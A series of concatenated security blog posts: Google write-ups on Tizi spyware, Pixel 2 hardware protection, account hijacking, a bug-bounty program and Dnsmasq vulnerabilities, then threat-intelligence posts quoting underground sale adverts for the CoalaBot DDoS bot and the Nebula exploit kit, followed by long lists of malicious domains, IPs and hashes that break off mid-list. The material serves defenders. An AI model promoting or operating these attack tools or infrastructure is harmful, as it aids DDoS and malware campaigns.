update Google's on-device security services and the systems that search for PHAs. These enhancements have been enabled for all users of our security services and increases coverage for Google Play users and the rest of the Android ecosystem.Additionally, there is more technical information below to help the security industry in our collective work against PHAs.What do I need to do?Through our investigation, we identified around 1,300 devices affected by Tizi. To reduce the chance of your device being affected by PHAs and other threats, we recommend these 5 basic steps:Check permissions: Be cautious with apps that request unreasonable permissions. For example, a flashlight app shouldn't need access to send SMS messages.Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.Update your device: Keep your device up-to-date with the latest security patches. Tizi exploited older and publicly known security vulnerabilities, so devices that have up-to-date security patches are less exposed to this kind of attack.Google Play Protect: Ensure Google Play Protect is enabled.Locate your device: Practice finding your device, because you are far more likely to lose your device than install a PHA.How does Tizi work?The Google Play Protect team had previously classified some samples as spyware or backdoor PHAs without connecting them as a family. The early Tizi variants didn't have rooting capabilities or obfuscation, but later variants did.After gaining root, Tizi steals sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. It usually first contacts its command-and-control servers by sending an SMS with the device's GPS coordinates to a specific number. Subsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server. The backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps. Tizi apps can also record ambient audio and take pictures without displaying the image on the device's screen.Tizi can root the device by exploiting one of the following local vulnerabilities:CVE-2012-4220CVE-2013-2596CVE-2013-2597CVE-2013-2595CVE-2013-2094CVE-2013-6282CVE-2014-3153CVE-2015-3636CVE-2015-1805Most of these vulnerabilities target older chipsets, devices, and Android versions. All of the listed vulnerabilities are fixed on devices with a security patch level of April 2016 or later, and most of them were patched considerably prior to this date. Devices with this patch level or later are far less exposed to Tizi's capabilities. If a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls.Samples uploaded to VirusTotalTo encourage further research in the security community, here are some sample applications embedding Tizi that were already on VirusTotal.Package nameSHA256 digestSHA1 certificatecom.press.nasa.com.tanofresh4d780a6fc18458311250d4d1edc750468fdb9b3e4c950dce5b35d4567b47d4a7816bbee3cab5eed00b8bd16df56032a96e243201com.dailyworkout.tizi7c6af091a7b0f04fb5b212bd3c180ddcc6abf7cd77478fd22595e5b7aa7cfd9f404b4d1a7176e219eaa457b0050b4081c22a9a1acom.system.update.systemupdate7a956c754f003a219ea1d2205de3ef5bc354419985a487254b8aeb865442a55e4d2962ac1f6551435709a5a874595d855b1fa8abAdditional digests linked to TiziTo encourage further research in the security community, here are some sample digests of exploits and utilities that were used or abused by Tizi.FilenameSHA256 digestrun_root_shellf2e45ea50fc71b62d9ea59990ced755636286121437ced6237aff90981388f6aiovyroot4d0887f41d0de2f31459c14e3133debcdf758ad8bbe57128d3bec2c907f2acf3filesbetyangu.tar9869871ed246d5670ebca02bb265a584f998f461db0283103ba58d4a650333be

Posted by Xiaowen Xin, Android Security TeamThe new Google Pixel 2 ships with a dedicated hardware security module designed to be robust against physical attacks. This hardware module performs lockscreen passcode verification and protects your lock screen better than software alone.To learn more about the new protections, let’s first review the role of the lock screen. Enabling a lock screen protects your data, not just against casual thieves, but also against sophisticated attacks. Many Android devices, including all Pixel phones, use your lockscreen passcode to derive the key that is then used to encrypt your data. Before you unlock your phone for the first time after a reboot, an attacker cannot recover the key (and hence your data) without knowing your passcode first. To protect against brute-force guessing your passcode, devices running Android 7.0+ verify your attempts in a secure environment that limits how often you can repeatedly guess. Only when the secure environment has successfully verified your passcode does it reveal a device and user-specific secret used to derive the disk encryption key.Benefits of tamper-resistant hardwareThe goal of these protections is to prevent attackers from decrypting your data without knowing your passcode, but the protections are only as strong as the secure environment that verifies the passcode. Performing these types of security-critical operations in tamper-resistant hardware significantly increases the difficulty of attacking it.Tamper-resistant hardware comes in the form of a discrete chip separate from the System on a Chip (SoC). It includes its own flash, RAM, and other resources inside a single package, so it can fully control its own execution. It can also detect and defend against outside attempts to physically tamper with it.In particular:Because it has its own dedicated RAM, it’s robust against many side-channel information leakage attacks, such as those described in the TruSpy cache side-channel paper.Because it has its own dedicated flash, it’s harder to interfere with its ability to store state persistently.It loads its operating system and software directly from internal ROM and flash, and it controls all updates to it, so attackers can’t directly tamper with its software to inject malicious code.Tamper-resistant hardware is resilient against many physical fault injection techniques including attempts to run outside normal operating conditions, such as wrong voltage, wrong clock speed, or wrong temperature. This is standardized in specifications such as the SmartCard IC Platform Protection Profile, and tamper-resistant hardware is often certified to these standards.Tamper-resistant hardware is usually housed in a package that is resistant to physical penetration and designed to resist side channel attacks, including power analysis, timing analysis, and electromagnetic sniffing, such as described in the SoC it to EM paper.Security module in Pixel 2The new Google Pixel 2 ships with a security module built using tamper-resistant hardware that protects your lock screen and your data against many sophisticated hardware attacks.In addition to all the benefits already mentioned, the security module in Pixel 2 also helps protect you against software-only attacks:Because it performs very few functions, it has a super small attack surface.With passcode verification happening in the security module, even in the event of a full compromise elsewhere, the attacker cannot derive your disk encryption key without compromising the security module first.The security module is designed so that nobody, including Google, can update the passcode verification logic to a weakened version without knowing your passcode first.SummaryJust like many other Google products, such as Chromebooks and Cloud, Android and Pixel are investing in additional hardware protections to make your device more secure. With the new Google Pixel 2, your data is safer against an entire class of sophisticated hardware attacks.

Posted by Kurt Thomas, Anti-Abuse Research; Angelika Moscicki, Account SecurityAccount takeover, or ‘hijacking’, is unfortunately a common problem for users across the web. More than 15% of Internet users have reported experiencing the takeover of an email or social networking account. However, despite its familiarity, there is a dearth of research about the root causes of hijacking.With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data. We’ve highlighted some important findings from our investigation below. We presented our study at the Conference on Computer and Communications Security (CCS) and it’s now available here.What we learned from the research proved to be immediately useful. We applied its insights to our existing protections and secured 67 million Google accounts before they were abused. We’re sharing this information publicly so that other online services can better secure their users, and can also supplement their authentication systems with more protections beyond just passwords.How hijackers steal passwords on the black marketOur research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.While our study focused on Google, these password stealing tactics pose a risk to all account-based online services. In the case of third-party data breaches, 12% of the exposed records included a Gmail address serving as a username and a password; of those passwords, 7% were valid due to reuse. When it comes to phishing and keyloggers, attackers frequently target Google accounts to varying success: 12-25% of attacks yield a valid password.However, because a password alone is rarely sufficient for gaining access to a Google account, increasingly sophisticated attackers also try to collect sensitive data that we may request when verifying an account holder’s identity. We found 82% of blackhat phishing tools and 74% of keyloggers attempted to collect a user’s IP address and location, while another 18% of tools collected phone numbers and device make and model.By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.Protecting our users from account takeoverOur findings were clear: enterprising hijackers are constantly searching for, and are able to find, billions of different platforms’ usernames and passwords on black markets. While we have already applied these insights to our existing protections, our findings are yet another reminder that we must continuously evolve our defenses in order to stay ahead of these bad actors and keep users safe.For many years, we’ve applied a ‘defense in-depth’ approach to security—a layered series of constantly improving protections that automatically prevent, detect, and mitigate threats to keep your account safe.PreventionA wide variety of safeguards help us to prevent attacks before they ever affect our users. For example, Safe Browsing, which now protects more than 3 billion devices, alerts users before they visit a dangerous site or when they click a link to a dangerous site within Gmail. We recently announced the Advanced Protection program which provides extra security for users that are at elevated risk of attack.DetectionWe monitor every login attempt to your account for suspicious activity. When there is a sign-in attempt from a device you’ve never used, or a location you don’t commonly access your account from, we’ll require additional information before granting access to your account. For example, if you sign in from a new laptop and you have a phone associated with you account, you will see a prompt—we’re calling these dynamic verification challenges—like this:This challenge provides two-factor authentication on all suspicious logins, while mitigating the risk of account lockout.MitigationFinally, we regularly scan activity across Google’s suite of products for suspicious actions performed by hijackers and when we find any, we lock down the affected accounts to prevent any further damage as quickly as possible. We prevent or undo actions we attribute to account takeover, notify the affected user, and help them change their password and re-secure their account into a healthy state.What you can doThere are some simple steps you can take that make these defenses even stronger. Visit our Security Checkup to make sure you have recovery information associated with your account, like a phone number. Allow Chrome to automatically generate passwords for your accounts and save them via Smart Lock. We’re constantly working to improve these tools, and our automatic protections, to keep your data safe.

Posted by Renu Chaudhary, Android Security and Rahul Mishra, Program ManagerWe have long enjoyed a close relationship with the security research community. To recognize the valuable external contributions that help us keep our users safe online, we maintain reward programs for Google-developed websites and apps, for Chrome and Chrome OS, and for the latest version of Android running on Pixel devices. These programs have been a success and helped uncover hundreds of vulnerabilities, while also paying out millions of dollars to participating security researchers and research teams.Today, we’re introducing the Google Play Security Reward Program to incentivize security research into popular Android apps available on Google Play. Through our collaboration with independent bug bounty platform, HackerOne, we’ll enable security researchers to submit an eligible vulnerability to participating developers, who are listed in the program rules. After the vulnerability is addressed, the eligible researcher submits a report to the Play Security Reward Program to receive a monetary reward from Google Play.With the ongoing success of our other reward programs, we invite developers and the research community to work together with us on proactively improving the security of some of the most popular Android apps on Google Play.The program is limited to a select number of developers at this time to get initial feedback. Developers can contact their Google Play partner manager to show interest. All developers will benefit when bugs are discovered because we will scan all apps for them and deliver security recommendations to the developers of any affected apps. For more information, visit the Play Security Reward Program on HackerOne.

Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program ManagerOur team has previously posted about DNS vulnerabilities and exploits. Lately, we’ve been busy reviewing the security of another DNS software package: Dnsmasq. We are writing this to disclose the issues we found and to publicize the patches in an effort to increase their uptake.Dnsmasq provides functionality for serving DNS, DHCP, router advertisements and network boot. This software is commonly installed in systems as varied as desktop Linux distributions (like Ubuntu), home routers, and IoT devices. Dnsmasq is widely used both on the open internet and internally in private networks.We discovered seven distinct issues (listed below) over the course of our regular internal security assessments. Once we determined the severity of these issues, we worked to investigate their impact and exploitability and then produced internal proofs of concept for each of them. We also worked with the maintainer of Dnsmasq, Simon Kelley, to produce appropriate patches and mitigate the issue.These patches have been upstreamed and are now committed to the project’s git repository. In addition to these patches we have also submitted another patch which will run Dnsmasq under seccomp-bpf to allow for additional sandboxing. This patch has been submitted to the DNSmasq project for review and we have also made it available here for those who wish to integrate it into an existing install (after testing, of course!). We believe the adoption of this patch will increase the security of DNSMasq installations.We would like to thank Simon Kelley for his help in patching these bugs in the core Dnsmasq codebase. Users who have deployed the latest version of Dnsmasq (2.78) will be protected from the attacks discovered here. Android partners have received this patch as well and it will be included in Android's monthly security update for October. Kubernetes versions 1.5.8, 1.6.11, 1.7.7, and 1.8.0 have been released with a patched DNS pod. Other affected Google services have been updated.During our review, the team found three potential remote code executions, one information leak, and three denial of service vulnerabilities affecting the latest version at the project git server as of September 5th 2017.CVEImpactVectorNotesPoCCVE-2017-14491RCEDNSHeap based overflow (2 bytes). Before 2.76 and this commit overflow was unrestricted.PoC, instructions and ASAN reportCVE-2017-14492RCEDHCPHeap based overflow.PoC, instructions and ASAN reportCVE-2017-14493RCEDHCPStack Based overflow.PoC, instructions and ASAN reportCVE-2017-14494Information LeakDHCPCan help bypass ASLR. PoC and InstructionsCVE-2017-14495OOM/DoSDNSLack of free() here.PoC and  instructions CVE-2017-14496DoSDNSInvalid boundary checks here. Integer underflow leading to a huge memcpy.PoC, instructions and ASAN reportCVE-2017-13704DoSDNSBug collision with CVE-2017-13704It is worth expanding on some of these:CVE-2017-14491 is a DNS-based vulnerability that affects both directly exposed and internal network setups. Although the latest git version only allows a 2-byte overflow, this could be exploited based on previous research. Before version 2.76 and this commit the overflow is unrestricted. ==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp0x7fff6165b9a8WRITE of size 1 at 0x62200001dd0b thread T0  #0 0x5105e6 in add_resource_record/test/dnsmasq/src/rfc1035.c:1141:7  #1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11  #2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11  #3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2  #4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7  #5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)  #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)CVE-2017-14493 is a trivial-to-exploit DHCP-based, stack-based buffer overflow vulnerability. In combination with CVE-2017-14494 acting as an info leak, an attacker could bypass ASLR and gain remote code execution.dnsmasq[15714]: segfault at 1337deadbeef ip 00001337deadbeef sp 00007fff1b66fd10 error 14 in libnss_files-2.24.so[7f7cfbacb000+a000]Android is affected by CVE-2017-14496 when the attacker is local or tethered directly to the device—the service itself is sandboxed so the risk is reduced. Android partners received patches on 5 September 2017 and devices with a 2017-10-01 security patch level or later address this issue.Proofs of concept are provided so you can check if you are affected by these issues, and verify any mitigations you may deploy.We would like to thank the following people for discovering, investigating impact/exploitability and developing PoCs: Felix Wilhelm, Fermin J. Serna, Gabriel Campana, Kevin Hamacher, Ron Bowes and Gynvael Coldwind of the Google Security Team.

CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising. 2017-09-11: a witnessed infection chain to CoalaBotA look inside :CoalaBot: Login Screen(August Stealer alike) CoalaBot: StatisticsCoalaBot: BotsCoalaBot: TasksCoalaBot: TasksCoalaBot: New Taks (list)CoalaBot: https get task detailsCoalaBot: http post task detailsCoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.(Thanks to Andrew Komarov and others who provided help here).------------------------------------------Coala Http Ddos Bot The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE ** - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate Other:• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE) Requirements:• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensionsScreenshots:• Statistics- http://i.imgur.com/FUevsaS.jpg• Bots - http://i.imgur.com/nDwl9pY.jpg• Created tasks - http://i.imgur.com/RltiDhl.png• Task List - http://i.imgur.com/tqEEpX0.jpg• Settings - http://i.imgur.com/EbhExjE.jpgPrice:• $300 - build and panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.Help with installation is no charge.------------------------------------------Sample:VT linkMD5 f3862c311c67cb027a06d4272b680a3bSHA1 0ff1584eec4fc5c72439d94e8cee922703c44049SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08fEmerging Threats rules :2024531 || ET TROJAN MSIL/CoalaBot CnC ActivityRead More:August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Nebula LogoWhile Empire (RIG-E) disappeared at the end of December after 4 months of activityIllustration of  the last month of witnessed Activity for Empireon 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.------Selling EK Nebula------Nebula Exploit kitFeatures:-Automatic domain scanning and generating (99% FUD)-API rotator domains-Exploit rate tested in different traffic go up 8/19%-knock rate tested whit popular botnet go 30/70%-Clean and modern user interface-Custom domains & server ( add & point your own domains coming soon...)-Unlimited flows & files-Scan file & domains-Multiple payload file types supported (exe , dll , js, vbs)-Multi. geo flow (split loads by country & file)-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting-Public stats by file & flow-latest CVE-2016 CVE-2017-custom features just ask supportSubscriptions:24h - 100$7d - 600$31d - 2000$Jabber - nebula-support@xmpp.jpOffering free tests to trusted users ------In same thread some screenshots were shared by a customer.Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown."GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) This Sundown variation was not so much different from the mainstream one.No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.Digging more it appeared it was featuring an Internal TDS (as Empire). The same exact call would give you a different payload in France or in United Kingdom/Japan."GamiNook" traffic with geo in France - 2017-02-17Identicall payload call gives you Gootkit instead of PitouPayload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the traffic illustrated in the advert thread is quite inline with the one captured in France).So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.The following days i saw other actor sending traffic to this EK.Taxonomy tied to Nebula Activity in MISP - 2017-03-02Taxonomy tied to GamiNook traffic activity, EK and resulting payloadToday URI pattern changed from this morning :/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN(which is Sundown/Beps without the index.php) to/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1/2003/01/27/exchange-monday-wilderness/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7/2006/08/05/fur-copper-shark/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20/2012/04/22/present-measure-physical-examination(for those who would like to build their regexp, more pattern available here : https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI )2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.Exploits: CVE-2014-6332 + CVE-2015-0016CVE-2013-2551CVE-2016-0189 godmodeCVE-2015-8651CVE-2015-7645CVE-2016-4117Files:  Nebula_2017-03-02 (2 fiddler - password is malware)Acknowledgement :Thanks Joseph C Chen and Brooks Li (Trendmicro),  Frank Ruiz (Fox-IT InTELL) and Andrew Komarov ( InfoArmor Inc. ) for the help on different aspect of this post.Edit:2017-03-03 Corrected some CVE id + not all payload are in clear---Some IOCsDateSha256Comment2017/02/17f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5Flash Exploit (CVE-2016-4117)2017/02/27be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2eccFlash Exploit (CVE-2016-4117)2017/02/1767d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)2017/02/1704fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41cFlash Exploit (CVE-2015-8651 Sample seen previously in Sundown)2017/02/17b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315cPitou2017/02/176fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8Gootkit2017/02/221a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64bRamnit2017/03/026764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4aDiamondFoxDateDomainIPComment2017/02/17tci.nhnph.com188.209.49.135Nebula Payload Domain2017/02/22gnd.lplwp.com188.209.49.135Nebula Payload Domain2017/02/24qcl.ylk8.xyz188.209.49.23Nebula Payload Domain2017/02/28hmn.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/03/02qgg.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/02/17agendawedge.shoemakerzippersuccess.stream188.209.49.135Nebula2017/02/17clausmessage.nationweekretailer.club217.23.7.15Nebula2017/02/17equipmentparticle.shockadvantagewilderness.club217.23.7.15Nebula2017/02/17salaryfang.shockadvantagewilderness.club217.23.7.15Nebula2017/02/22deficitshoulder.lossicedeficit.pw188.209.49.135Nebula2017/02/22distributionjaw.hockeyopiniondust.club188.209.49.135Nebula2017/02/22explanationlier.asiadeliveryarmenian.pro188.209.49.135Nebula2017/02/23cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/23instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23soldierprice.distributionstatementdiploma.site188.209.49.135Nebula2017/02/23swissfacilities.gumimprovementitalian.stream188.209.49.135Nebula2017/02/23transportdrill.facilitiesturkishdipstick.info188.209.49.135Nebula2017/02/24authorisationmessage.casdfble.stream188.209.49.151Nebula2017/02/24cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24departmentant.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24disadvantageproduction.brassreductionquill.site188.209.49.151Nebula2017/02/24disadvantageproduction.casdfble.stream188.209.49.151Nebula2017/02/24europin.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24hygienicreduction.brassreductionquill.site188.209.49.151Nebula2017/02/24hygienicreduction.casdfble.stream188.209.49.151Nebula2017/02/24instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24jobhate.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24limitsphere.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24printeroutput.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24redrepairs.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24soldierprice.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24suggestionburn.distributionstatementdiploma.site188.209.49.151Nebula2017/02/25advertiselaura.bubblecomparisonwar.top188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.151Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/25apologycold.shearssuccessberry.club188.209.49.151Nebula2017/02/25authorizationmale.foundationspadeinventory.club188.209.49.151Nebula2017/02/25birthdayexperience.foundationspadeinventory.club188.209.49.151Nebula2017/02/25confirmationaustralian.retaileraugustplier.club188.209.49.151Nebula2017/02/25dancerretailer.shearssuccessberry.club188.209.49.151Nebula2017/02/25employergoods.deliverycutadvantage.info188.209.49.151Nebula2017/02/25fallhippopotamus.deliverycutadvantage.info188.209.49.151Nebula2017/02/25goallicense.shearssuccessberry.club188.209.49.151Nebula2017/02/25goalpanda.retaileraugustplier.club188.209.49.151Nebula2017/02/25holidayagenda.retaileraugustplier.club188.209.49.151Nebula2017/02/25marketsunday.deliverycutadvantage.info188.209.49.151Nebula2017/02/25penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25purposeguarantee.shearssuccessberry.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.49Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/25rollinterest.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.49Nebula2017/02/26advantagelamp.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/26budgetdegree.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26competitionseason.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26customergazelle.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26decembercommission.divingfuelsalary.trade93.190.141.200Nebula2017/02/26distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/26equipmentwitness.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26invoiceburst.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/26jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/26rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/26startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/27approveriver.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/27invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/27jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/27lipprice.edgetaxprice.site93.190.141.45Nebula2017/02/27marginswiss.divingfuelsalary.trade93.190.141.200Nebula2017/02/27outputfruit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/27reindeerprofit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27reminderdonna.divingfuelsalary.trade93.190.141.200Nebula2017/02/27startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27supplyheaven.gramsunshinesupply.club93.190.141.39Nebula2017/02/27transportbomb.gramsunshinesupply.club93.190.141.39Nebula2017/02/28afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/28agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/02/28bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28cert